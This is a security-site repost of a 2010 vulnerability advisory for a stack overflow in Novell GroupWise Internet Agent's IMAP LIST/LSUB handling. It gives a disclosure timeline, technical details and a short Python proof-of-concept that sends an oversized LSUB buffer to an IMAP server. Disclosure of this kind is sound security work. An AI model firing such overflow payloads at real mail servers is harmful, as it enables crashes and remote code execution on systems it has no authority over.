首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution
来源:http://www.protekresearchlab.com 作者:Provencher 发布时间:2010-11-09  

#####################################################################################

Application:   Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution Vulnerability

Platforms:   SLES 10 SP3 (GroupWise 8.0.2)

Exploitation:   Remote code execution

CVE Number: 

Novell TID: 7007157

Author:   Francis Provencher (Protek Research Lab's)

WebSite:   http://www.protekresearchlab.com/


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#####################################################################################

===============
1) Introduction
===============

Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in

enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental
in making the Utah Valley a focus for technology and software development. Novell technology contributed to the
emergence of local area networks, which displaced the dominant mainframe computing model and changed computing
worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#####################################################################################

============================
2) Report Timeline
============================

2010-08-27  Vulnerability reported to vendor
2010-11-08  Vendor disclose patch


#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise

Internet Agent where IMAP services run. Authentication is required to exploit this vulnerability.

The flaw exists within the IMAP functionality included with GWIA. When provided with an overly long LIST or LSUB request
to the CREATE verb, the IMAP server can be forced to overflow a buffer on the stack. Successful exploitation leads to

remote code execution under the context of the server.


#####################################################################################

===========
4) The Code
===========

#!/usr/bin/python
#
# Francis Provencher for Protek Research Lab's.
#
#


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 1368

s.connect(('192.168.100.178',143))
s.recv(1024)
s.send('A001 LOGIN test  test ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 LSUB aa ' + buffer + '\r\n')
s.recv(1024)
s.close()

 

#####################################################################################

(PRL-2010-08)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·G Data TotalCare 2011 0day Loc
·Novell Groupwise Internet Agen
·PCSX2 0.9.7 beta Binary Denial
·Woltlab Burning Board Userloca
·DeluxeBB versions 1.3 and belo
·Oracle MySQL < 5.1.49 'WITH RO
·WordPress Database Interface T
·IBM OmniFind CSRF Vulnerabilit
·Android versions 2.0 and 2.1 r
·IBM OmniFind Buffer Overflow V
·DeluxeBB <= 1.3 Private Info D
·IBM OmniFind Privilege Escalat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved